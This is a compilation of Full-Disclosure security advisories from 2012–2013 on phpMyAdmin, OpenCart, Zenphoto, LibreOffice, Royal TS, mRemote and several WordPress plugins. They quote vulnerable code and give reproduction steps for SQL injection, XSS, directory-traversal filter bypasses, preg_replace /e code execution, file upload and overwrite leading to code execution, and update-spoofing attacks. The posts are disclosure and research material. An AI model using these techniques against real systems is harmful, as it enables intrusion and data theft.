[Full-disclosure] [waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin
[waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin === Author: Janek Vind "waraxe" Date: 22. May 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-104.html Description of vulnerable software: ~~~ Spider Event Calendar is a highly configurable plugin which allows you to have multiple organized events in a calendar. This plugin is one of the best WordPress Calendar available in WordPress Directory. If you have problem with organizing your WordPress Calendar events and displaying them in a calendar format, then Spider WordPress Calendar Plugin is the best solution. http://wordpress.org/extend/plugins/spider-event-calendar/ http://web-dorado.com/products/wordpress-calendar.html Vulnerable is current version 1.3.0, older versions not tested. ### 1. Insufficient access check for AJAX operations in "calendar.php" ### Reason: 1. weak access control implementation Preconditions: 1. must be logged in as Wordpress user Impact: 1. Any Wordpress user can edit Spider Calendar Php script "calendar.php" line 197: [ source code start ]-- add_action('wp_ajax_spidercalendarinlineedit', 'spider_calendar_quick_edit'); add_action('wp_ajax_spidercalendarinlineupdate', 'spider_calendar_quick_update'); function spider_calendar_quick_update(){ global $wpdb; if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) && isset($_POST['us_12_format_sp_calendar'])){ $wpdb->update( ... function spider_calendar_quick_edit(){ global $wpdb; if(isset($_POST['calendar_id'])){ $row=$wpdb->get_row( [ source code end ] We can see, that AJAX actions "wp_ajax_spidercalendarinlineedit" and "wp_ajax_spidercalendarinlineupdate" are bound to functions "spider_calendar_quick_edit" and "spider_calendar_quick_update". This two functions are meant to be used only by admin, but there is nothing to stop low privileged users. Even users with "Subscriber" access level can use those two AJAX functions. Test: http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineedit"; method="post"> Result: calendar editing form will be shown Remark: This weakness in access control makes next two SQL injection vulnerabilities much more critical - there is no need for admin privileges, even low level Wordpress user is able to exploit these vulnerabilities. ### 2. SQL Injection in "calendar.php" function "spider_calendar_quick_update" ### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied POST parameter "calendar_id" Preconditions: 1. must be logged in as Wordpress user Php script "calendar.php" line 199: [ source code start ]-- add_action('wp_ajax_spidercalendarinlineupdate', 'spider_calendar_quick_update'); function spider_calendar_quick_update(){ global $wpdb; if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) && isset($_POST['us_12_format_sp_calendar'])){ ... $row=$wpdb->get_row("SELECT * FROM ".$wpdb->prefix."spidercalendar_calendar WHERE id=".$_POST['calendar_id']); [ source code end ] As seen above, user-supplied POST parameter "calendar_id" is used in SQL query without any sanitization, resulting in SQL injection vulnerability. Test: http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineupdate"; method="post"> Result: in case of success it will be revealed sensitive information about Wordpress user with ID 1: username, password hash and email. ### 3. SQL Injection in "calendar.php" function "spider_calendar_quick_edit" ### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied POST parameter "calendar_id" Precondi
[Full-disclosure] [waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin === Author: Janek Vind "waraxe" Date: 25. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-103.html Description of vulnerable software: ~~~ phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. http://www.phpmyadmin.net/home_page/index.php ### 1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php" ### Reason: 1. insufficient sanitization of user data before using in preg_replace Attack vectors: 1. user-supplied parameters "from_prefix" and "to_prefix" Preconditions: 1. logged in as valid PMA user 2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in regex) PMA security advisory: PMASA-2013-2 CVE id: CVE-2013-3238 Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2 Result: PMA user is able to execute arbitrary PHP code on webserver Let's take a look at the source code: Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8): [ source code start ]-- case 'replace_prefix_tbl': $current = $selected[$i]; $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current); $a_query = 'ALTER TABLE ' . PMA_backquote($selected[$i]) . ' RENAME ' . PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN $run_parts = true; break; case 'copy_tbl_change_prefix': $current = $selected[$i]; $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current); $a_query = 'CREATE TABLE ' . PMA_backquote($newtablename) . ' SELECT * FROM ' . PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX PATTERN $run_parts = true; break; [ source code end ] We can see, that PHP variables "$from_prefix" and "$to_prefix" are used in preg_replace function without any sanitization. It appears, that those variables are coming from user submitted POST request as parameters "from_prefix" and "to_prefix". It is possible to inject e-modifier with terminating null byte via first parameter and php code via second parameter. In case of successful exploitation injected PHP code will be executed on PMA webserver. Tests: 1. Log in to PMA and select database: http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8 2. select one table from database by using checkbox and then select "Replace table prefix" from select control "With selected:". 3. We can see form named "Replace table prefix:" with two input fields. Type "/e%00" to the "From" field and "phpinfo()" to the "To" field. 4. Activate Tamper Data Firefox add-on: https://addons.mozilla.org/en-us/firefox/addon/tamper-data/ 5. Click "Submit", Tamper Data pops up, choose "Tamper". 6. Now we can modify POST request. Look for parameter "from_prefix". It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00". Click "OK" and Firefox will send out manipulated POST request. 7. We are greeted by phpinfo function output - code execution is confirmed. PMA version 4.0.0-RC2 contains almost identical vulnerability: Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2): [ source code start ]-- case 'replace_prefix_tbl': $current = $selected[$i]; $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current); $a_query = 'ALTER TABLE ' . PMA_Util::backquote($selected[$i]) . ' RENAME ' . PMA_Util::backquote($newtablename); // CHANGE PREFIX PATTERN $run_parts = true; break; case 'copy_tbl_change_prefix': $current = $selected[$i]; $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current); $a_query = 'CREATE TABLE ' . PMA_Util::backquote($newtablename) . ' SELECT * FROM ' . PMA_Util::backquote($selected[$i]); // COPY TABLE AND CHANGE PREFIX PATTERN $run_parts = true;
[Full-disclosure] [waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7
[waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7 === Author: Janek Vind "waraxe" Date: 09. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-102.html Description of vulnerable software: ~~~ phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. http://www.phpmyadmin.net/home_page/index.php Affected are versions 3.5.0 to 3.5.7, older versions not vulnerable. ### 1. Reflected XSS in "tbl_gis_visualization.php" ### Reason: 1. insufficient sanitization of html output Attack vectors: 1. user-supplied parameters "visualizationSettings[width]" and "visualizationSettings[height]" Preconditions: 1. valid session 2. "token" parameter must be known 3. valid database name must be known Php script "tbl_gis_visualization.php" line 51: [ source code start ]-- // Get settings if any posted $visualizationSettings = array(); if (PMA_isValid($_REQUEST['visualizationSettings'], 'array')) { $visualizationSettings = $_REQUEST['visualizationSettings']; ... [ source code end ] Tests (parameters "db" and "token" must be valid): http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&; token=17961b7ab247b6d2b39d730bf336cebb& visualizationSettings[width]=">alert(123); http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&; token=17961b7ab247b6d2b39d730bf336cebb &visualizationSettings[height]=">alert(123); Result: javascript alert box pops up, confirming Reflected XSS vulnerability. Disclosure timeline: ~~~ 31.03.2013 -> Sent email to developers 31.03.2013 -> First response email from developers 02.04.2013 -> Second email from developers - XSS patched in Git repository 03.04.2013 -> phpMyAdmin 3.5.8-rc1 is released 08.04.2013 -> phpMyAdmin 3.5.8 is released 09.04.2013 -> public advisory released Contact: ~~~ come2war...@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ -- [ EOF ] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1
[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1.5 === Author: Janek Vind "waraxe" Date: 29. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-101.html Description of vulnerable software: ~~~ Royal TS is a simple, yet powerful tool for administrators, developers, system engineers and many other IT focused information workers that supports them in working effortless with their remote systems or management consoles. http://www.royalts.com/main/home/win.aspx Vulnerable is version 2.1.5, other versions not tested. ### 1. Update Spoofing Vulnerability ### Current version of Royal TS contains security vulnerability in update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, Royal TS issues GET request over HTTP: GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM HTTP/1.1 Cache-Control: no-cache Host: www.royalts.com Connection: Keep-Alive Server response: HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT Accept-Ranges: bytes ETag: "d11e6057ebc3cd1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Thu, 28 Mar 2013 19:54:39 GMT Content-Length: 13375 http://www.w3.org/2001/XMLSchema"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";> 2 1 5 61116 http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi <html lang="en" xmlns="http://www.w3.org/1999/xhtml"><; ... Royal TS user can click "Start Download" button and Royal TS will open web browser with download starting dialog. Such update mechanism contains security flaw: Update check is done over unencrypted HTTP channel. Malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response. In this way it is possible to instruct user to download malicious update. Testing: tests were done using Windows 7 and Apache webserver. Steps: 1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing: 127.0.0.1 www.royalts.com 2. create xml file "/dl/RoyalTS/VersionInfo.xml" to the webserver directory with following content: http://www.w3.org/2001/XMLSchema"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";> 2 3 4 61116 http://localhost/calc.exe New version 2.3.4 available! 3. Place "calc.exe" file to the webserver main directory. 4. Open Royal TS, it will check for updates automatically, resulting in dialog: New version 2.3.4 available! 5. Press "Start Download" button. Default web browser window will be open offering file download: "You have chosen to open calc.exe" Contact: ~~~ come2war...@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ -- [ EOF ] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50
[waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50 === Author: Janek Vind "waraxe" Date: 29. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-100.html Description of vulnerable software: ~~~ mRemote is a software solution that will allow you to manage all your remote control connections in a single place. Currently it supports the RDP, VNC, SSH2 and Telnet protocols. http://www.royalts.com/main/home/mRemote.aspx http://mremote-portable.softpile.com/58492/download/ Vulnerable is version 1.50, other versions not tested. ### 1. Update Spoofing Vulnerability ### Current version of mRemote contains security vulnerability in update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, mRemote issues GET request over HTTP: GET /mRemote_Update.txt HTTP/1.1 Host: update.mremote.org Connection: Keep-Alive Server response: HTTP/1.1 200 OK Content-Length: 284 Content-Type: text/plain Last-Modified: Wed, 22 Apr 2009 18:29:48 GMT Accept-Ranges: bytes ETag: "16cc425178c3c91:1e75" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 28 Mar 2013 14:03:07 GMT Version: 1.50 dURL: http://www.mremote.org/wiki/GetFile.aspx?File=Downloads/mRemote_1.50_Setup.exe clURL: http://update.mRemote.org/mRemote_1.50_ChangeLog.txt imgURL: http://update.mRemote.org/banners/Banner_vRD09.png imgURLLink: http://www.visionapp.com/vRD2009-highlights.html mRemote user can click "Download and Install" button and mRemote will download and install the update. Such update mechanism contains two security flaws: 1. Update check is done over unencrypted HTTP channel. Malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response. In this way it is possible to instruct mRemote to download malicious update. 2. mRemote will execute downloaded update without digital signature verification. Testing: tests were done using Windows 7 and Apache webserver. Steps: 1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing: 127.0.0.1 update.mremote.org 2. create text file "mRemote_Update.txt" to the webserver main directory with following content: Version: 1.51 dURL: http://localhost/calc.exe clURL: http://localhost/mRemote_1.51_ChangeLog.txt imgURL: http://update.mRemote.org/banners/Banner_vRD09.png imgURLLink: http://www.visionapp.com/vRD2009-highlights.html 3. create text file "mRemote_1.51_ChangeLog.txt" to the webserver main directory with following content: New version 1.51 available! 4. Place "calc_EN.exe" file to the webserver main directory. 5. Open mRemote, it will check for updates automatically. Response: New version 1.51 available! 6. Press "Download and Install" button. Successful download ends with response: Download complete! mRemote will now quit and begin with the installation. 7. Press "OK" button and downloaded exe file will be executed. Contact: ~~~ come2war...@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ -- [ EOF ] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2013-SA#099] - Update Spoofing Vulnerability in LibreOffice 4.0.1.2
[waraxe-2013-SA#099] - Update Spoofing Vulnerability in LibreOffice 4.0.1.2 === Author: Janek Vind "waraxe" Date: 21. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-99.html Description of vulnerable software: ~~~ LibreOffice is a free and open source office suite, developed by The Document Foundation. It is descended from OpenOffice.org, from which it was forked in 2010. The LibreOffice suite includes a word processor, spreadsheet, graphics editor, slideshow creator, database and math formula writer. http://www.libreoffice.org/ Affected are versions 3.5.1 to newest 4.0.1.2, older versions were not tested. ### 1. Update Spoofing Vulnerability ### It appears, that current version of LibreOffice contains security vulnerability in update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, LibreOffice issues GET request over HTTP: GET /check.php HTTP/1.1 Connection: TE, close TE: trailers Host: update.libreoffice.org Accept-Encoding: gzip Pragma: no-cache Accept-Language: en-US User-Agent: LibreOffice 4.0 .0.3 (7545bee9c2a0782548772a21bc84a9dcc583b89; Windows; x86; BundledLanguages=en-US af am ar as ast be bg bn bn-IN bo ...) Server at "update.libreoffice.org" responds with XML data: http://update.libreoffice.org/description";> LibreOffice 4.0.1 84102822e3d61eb989ddd325abf1ac077904985 Windows x86 4.0.1 http://www.libreoffice.org/download/"; /> LibreOffice user can click "Download" and "Install" buttons and LibreOffice will download and install the update. Such update mechanism contains two security flaws: 1. Update check is done over unencrypted HTTP channel. Malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response. In this way it is possible to instruct LibreOffice to download malicious update. 2. LibreOffice will execute downloaded update without digital signature verification. Testing: tests were done using Windows 7, Apache and PHP. Steps: 1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing: 127.0.0.1 update.libreoffice.org 2. create php file "check.php" to the webserver main directory: http://update.libreoffice.org/description";> LibreOffice 5.6.7 123456789 Windows x86 5.6.7 http://localhost/notepad.exe"; /> '; ?> 3. Place "notepad.exe" file to the webserver main directory. 4. Open LibreOffice Writer -> Help -> Check For Updates Response: LibreOffice 5.6.7 is available. 5. Press "Download" button. Successful download ends with response: Download of LibreOffice 5.6.7 completed. Ready for installation. 6. Press "Install" button, choose "Yes" and after that Notepad will be opened. Contact: ~~~ come2war...@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ -- [ EOF ] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
[waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1 === Author: Janek Vind "waraxe" Date: 19. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-98.html Description of vulnerable software: ~~~ OpenCart is a turn-key ready "out of the box" shopping cart solution. You simply install, select your template, add products and your ready to start accepting orders. http://www.opencart.com/ Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too. ### 1. Directory Traversal Vulnerabilities in "filemanager.php" ### Reason: insufficient sanitization of user-supplied data Attack vectors: 1. user-supplied POST parameters "directory", "name", "path", "from", "to" Preconditions: 1. Logged in as admin with filemanager access privileges Script "filemanager.php" offers for OpenCart admins various file related services: directory listing and creation, image file listing, file copy/move/unlink, upload, image resize. By the design OpenCart admin can manage files and directories only inside specific subdirectory "image/data/". It means, that even if you have OpenCart admin privileges, you still are not suppose to get access to the files and directories below "image/data/". So far, so good. But what about directory traversal? Let's have a look at the source code. PHP script "admin/controller/common/filemanager.php" line 66: [ source code start ]-- public function directory() { $json = array(); if (isset($this->request->post['directory'])) { $directories = glob(rtrim(DIR_IMAGE . 'data/' . str_replace('../', '', $this->request->post['directory']), '/') . '/*', GLOB_ONLYDIR); if ($directories) { $i = 0; foreach ($directories as $directory) { $json[$i]['data'] = basename($directory); $json[$i]['attributes']['directory'] = utf8_substr($directory, strlen(DIR_IMAGE . 'data/')); ... $this->response->setOutput(json_encode($json)); [ source code end ] We can see, that directory traversal is prevented by removing "../" substrings from user submitted parameters. At first look this seems to be secure enough - if we can't use "../", then directory traversal is impossible, right? Deeper analysis shows couple of shortcomings in specific filtering method. First problem - if OpenCart is hosted on Windows platform, then it's possible to use "..\" substring for directory traversal. Test (parameter "token" must be valid): -[ test code start ]--- http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25"; method="post"> --[ test code end ] Server response is in JSON format and contains listing of subdirectories outside of OpenCart main directory. Second problem - filtering with "str_replace" can be tricked by using custom strings. If we use "..././" substring, then after filtering in becomes "../". So it appears, that implemented anti-traversal code is ineffective and can be bypassed. Test (parameter "token" must be valid): -[ test code start ]--- http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25"; method="post"> --[ test code end ] Server response is exactly same as in previous test - information about directory structure outside of OpenCart main directory has been disclosed. PHP script "filemanager.php" contains 14 uses of "str_replace('../', ''," code. Most of the public functions in "filemanager.php" are affected by directory traversal vulnerability: public function directory() -> listing of subdirectories public function files() -> listing of image files public function create() -> creation of new directories public function delete() -> deletion of arbitrary files and directorie
[Full-disclosure] [waraxe-2012-SA#096] - Multiple Vulnerabilities in Zenphoto 1.4.3.3
[waraxe-2012-SA#096] - Multiple Vulnerabilities in Zenphoto 1.4.3.3 === Author: Janek Vind "waraxe" Date: 03. November 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-96.html Description of vulnerable software: ~~~ Zenphoto is a standalone CMS for multimedia focused websites. Our focus lies on being easy to use and having all the features there when you need them (but out of the way if you do not.) Zenphoto features support for images, video and audio formats, and the Zenpage CMS plugin provides a fully integrated news section (blog) and custom pages to run entire websites. http://www.zenphoto.org/ https://code.google.com/p/zenphoto/ Affected versions: Zenphoto 1.4.3.3 and older Patched version: Zenphoto 1.4.3.4 ### 1. SQL Injection in "zp-core/zp-extensions/failed_access_blocker.php" ### Reason: insufficient sanitization of user-supplied data Attack vector: user-supplied HTTP header "X_FORWARDED_FOR" Preconditions: 1. plugin "failed_access_blocker" activated (disabled by default) "failed_access_blocker" plugin will log every failed authentication attempt: Php script "zp-core/zp-extensions/failed_access_blocker.php" line 75: [ source code start ]-- function failed_access_blocker_adminGate($allow, $page) { ... // add this attempt $sql = 'INSERT INTO '.prefix('plugin_storage').' (`type`, `aux`,`data`) VALUES ("failed_access", "'.time().'","'.getUserIP().'")'; query($sql); // check how many times this has happened recently count = db_count('plugin_storage','WHERE `type`="failed_access" AND `data`="'.getUserIP().'"'); [ source code end ] IP address of the user comes from function "getUserIP()" and is used in SQL query. Let's look at the function "getUserIP()". Php script "zp-core/functions.php" line 1979: [ source code start ]-- function getUserIP() { if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { return sanitize($_SERVER['HTTP_X_FORWARDED_FOR'], 0); } else { return sanitize($_SERVER['REMOTE_ADDR'], 0); [ source code end ] Function "sanitize()" does following things to the input data: 1. strips slashes if magic_quotes_gpc=on 2. strips null bytes 3. strips html tags So we can see, that function "sanitize()" will prevent null byte tricks and most of the XSS exploits, but it does not escape or delete single and double quotes, therefore SQL Injection may still be possible. Actually this function makes SQL Injection more likely to occur because it reverts effects of the "magic_quotes_gpc". As result of such insuffient input data sanitization, attacker can use HTTP header "X_FORWARDED_FOR" for SQL Injection. Test: Let's use Firefox browser with Tamper Data Add-on. 1. Open admin page: http://localhost/zenphoto1433/zp-core/admin.php 2. Activate Tamper data (Start Tamper) 3. Try to log in with bogus credentials, Tamper Data triggers 4. "Tamper with request?" -> "Tamper" 5. "Add element" -> X_FORWARDED_FOR=war"axe 6. Click "OK" and tampered request will go to the server As result we will see blank page (OK 200 response code, content length 0). But let's look at "debug.log" in "zp-data": Backtrace: USER ERROR: MySql Error: ( INSERT INTO `[prefix]plugin_storage` (`type`, `aux`,`data`) VALUES ("failed_access", "1349792737","war"axe") ) failed. MySql returned the error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'axe")' ### 2. SQL Injection in "zp-core/zp-extensions/search_statistics.php" ### Reason: insufficient sanitization of user-supplied data Attack vector: user-supplied HTTP header "X_FORWARDED_FOR" Preconditions: 1. plugin "search_statistics" activated (disabled by default) Php script "zp-core/zp-extensions/search_statistics.php" line 101: [ source code start ]---
[Full-disclosure] [waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin
[waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin === Author: Janek Vind "waraxe" Date: 30. October 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-95.html Description of vulnerable target: ~~~ FoxyPress is a FREE shopping cart and product management tool that integrates with FoxyCart's e-commerce solution to help you get your store up and running quickly and efficiently. http://wordpress.org/extend/plugins/foxypress/ Affected version: 0.4.2.5 ### 1. Arbitrary File Upload Vulnerability in "documenthandler.php" ### Reasons: Missing security checks in file upload functionality Attack vectors: Uploaded file Preconditions: Logged in as admin with FoxyPress product editing privileges Php script "documenthandler.php" line 14: [ source code start ]-- if (!empty($_FILES)) { ... $targetpath = ABSPATH . INVENTORY_DOWNLOADABLE_LOCAL_DIR; ... $newfilename = foxypress_GenerateNewFileName($fileExtension, $inventory_id, $targetpath, $prefix); $targetpath = $targetpath . $newfilename; if(move_uploaded_file($_FILES['Filedata']['tmp_name'], $targetpath)) [ source code end ] As we can see above, there is no security checks against uploaded file. As result, attacker is able to upload files with arbitrary extension to remote system. In case of php files this vulnerability leads to RCE (Remote Code Execution). Test: 1. Open product editing webpage: http://localhost/wp342/wp-admin/post.php?post=43&action=edit 2. Look for "Digital Downloads". Insert some number to the input box below: "Max Downloads allowed (if you need to override the main setting)". 3. There must be "Browse Files" button (Flash-based). Choose the php file, you want to upload. We can observe AJAX in action and as result download link appears: http://localhost/wp342/wp-content/inventory_downloadables/my_download_jw82ku0jz9_43.php Opening that download link will execute previously uploaded php file. ### 2. SQL Injection Vulnerability in "documenthandler.php" ### Reasons: Insufficient sanitization of user-supplied data Attack vectors: User-supplied POST parameter "prefix" Preconditions: Logged in as admin with FoxyPress product editing privileges Php script "documenthandler.php" line 14: [ source code start ]-- if (!empty($_FILES)) { $inventory_id = intval( $_POST['inventory_id'] ); $downloadabletable = $_POST['prefix']; ... $query = "INSERT INTO " . $downloadabletable . " SET inventory_id='" . $inventory_id . "', filename='" . mysql_escape_string($newfilename) . "', maxdownloads= '" . mysql_escape_string($downloadablemaxdownloads) . "', status = 1"; $wpdb->query($query); [ source code end ] We can see, that user-supplied POST parameter "prefix" in used in subsequent SQL "INSERT INTO" query as table name. There is no input data sanitization, therefore attacker is able to insert any data to any tables in current database. Test (parameter "security" must be valid): -[ test code start ]--- http://localhost/wp342/wp-admin/admin-ajax.php?action=foxypress_download&security=844b64ce45"; method="post" enctype="multipart/form-data"> --[ test code end ] Result (Wordpress must be set to show SQL errors): WordPress database error: [Table 'wp342.waraxe' doesn't exist] INSERT INTO waraxe SET inventory_id='0', filename='downloadable_qga73aojs8_0.php', maxdownloads= '1', status = 1 ### 3. SQL Injection Vulnerability in "foxypress-manage-emails.php" ### Reasons: Insufficient sanitization of user-supplied data Attack vectors: User-supplied GET parameter "id" Preconditions: Logged in as admin with FoxyPress management privileges Php script &quo
[Full-disclosure] [waraxe-2012-SA#094] - Multiple Vulnerabilities in Wordpress GRAND Flash Album Gallery Plugin
[waraxe-2012-SA#094] - Multiple Vulnerabilities in Wordpress GRAND Flash Album Gallery Plugin = Author: Janek Vind "waraxe" Date: 24. October 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-94.html Description of vulnerable target: ~~~ Try GRAND Flash Album Gallery - powerful flash & jQuery media content plugin. It provides a comprehensive interface for handling image galleries, audio and video. You can edit your media content the way you want: upload images, import music and video, create photo gallery, music playlists, group pictures in slideshow and add descriptions for each image, mp3 or video - GRAND FlAGallery is the smart choice when showing the best of your product or describing in brief any event. http://codeasily.com/wordpress-plugins/flash-album-gallery/flag http://wordpress.org/extend/plugins/flash-album-gallery/ Affected versions: 1.9.0, 2.0.0 ### 1. Arbitrary File Overwrite Vulnerability in "admin/skin_options.php" ### Reasons: 1. Insecure use of "parse_str()" 2. Uninitialized variable "$mainXML" Attack vector: User-supplied POST parameters "settingsXML" and "mainXML" Precondition: Logged in as admin with "FlAG Change skin" privileges Php script "admin/skin_options.php" line: [ source code start ]-- $settingsXML = $settings.'/settings.xml'; $flashPost = file_get_contents("php://input"); // parse properties_skin parse_str($flashPost); if(isset($properties_skin) && !empty($properties_skin)) { $fp = fopen($settingsXML, "r"); if(!$fp) { exit( "2");//Failure - not read; } while(!feof($fp)) { $mainXML .= fgetc($fp); } $fp = fopen($settingsXML, "w"); if(!$fp) exit("0");//Failure $newProperties = preg_replace("|.*?|si", $properties_skin, $mainXML); fwrite($fp, $newProperties); fclose($fp); echo "1";//Save [ source code end ] As we can observe, php function "parse_str()" is used with user-supplied POST parameters as argument. This is very dangerous coding style, because it's possible to overwrite any variables set before this code line. Attacker can overwrite variable "$settingsXML", which is used as path to the file, being overwritten in next steps. So it's obvious, that attacker can choose any files on remote system to be overwritten. Next interesting problem here is, that variable "$mainXML" is uninitialized. It means, that attacker is able to write any data to that variable, using the same "parse_str()", and as result, arbitrary data can be written (prepended) to arbitrary file on remote system. Attacker can utilize this vulnerability for injecting php code to existing files on remote system, which ultimately leads to RCE (Remote Code Execution). Test (file "wp-content/plugins/hello.php" must exist and be writable): -[ test code start ]--- http://localhost/wp342/wp-content/plugins/flash-album-gallery/admin/skin_options.php"; method="post"> --[ test code end ] Injected php code can be executed by following request: http://localhost/wp342/wp-content/plugins/hello.php ### 2. Arbitrary File Overwrite Vulnerability in "lib/constructor.php" ### Reasons: 1. Insecure use of "parse_str()" 2. Uninitialized variable "$mainXML" Attack vector: User-supplied POST parameters "skin_name" and "mainXML" Preconditions: 1. Logged in as admin with "FlAG Change skin" privileges 2. "magic_quotes_gpc=off" for successful null-byte attacks 3. PHP must be < 5.3.4 for successful null-byte attacks Php script "lib/constructor.php" line 25: [ source code start ]-- $flashPost = file_get_contents("php://input"); // parse properties_skin parse_str($flashPost); $settingsXML = str_replace("\\","/", dirname(dirname(dirname(__FILE__))). '/flagallery-skins/'.$skin_name.'/settings/settings.xml'); if(isset($properties_skin) && !empty($properties_skin)) { $fp
[Full-disclosure] [waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin
[waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin == Author: Janek Vind "waraxe" Date: 17. October 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-93.html Description of vulnerable target: ~~~ Enables Social Sharing of your blog posts to 30+ Social Networks. Plugin also enables you to Automatically Publish or Self Publish your Blog Posts to 25+ Networks. http://wordpress.org/extend/plugins/social-discussions/ Affected version: 6.1.1 ### 1. Remote File Inclusion in "social-discussions-networkpub_ajax.php" ### Reasons: Uninitialized variable "$HTTP_ENV_VARS" Attack vectors: User-supplied parameter "HTTP_ENV_VARS" Preconditions: 1. register_globals=on 2. register_long_arrays=off 3. allow_url_include=on for RFI if PHP >= 5.2.0 4. PHP must be < 5.3.4 for LFI null-byte attacks 5. magic_quotes_gpc=off for LFI null-byte attacks Php script "social-discussions-networkpub_ajax.php" line 2: [ source code start ]-- if (!function_exists('add_action')){ @include_once($GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . "/wp-config.php"); [ source code end ] We can see, that script expects old-style array "HTTP_ENV_VARS" to be initialized and containing "DOCUMENT_ROOT" entry. But it appears, that if PHP directive "register_long_arrays=off", then 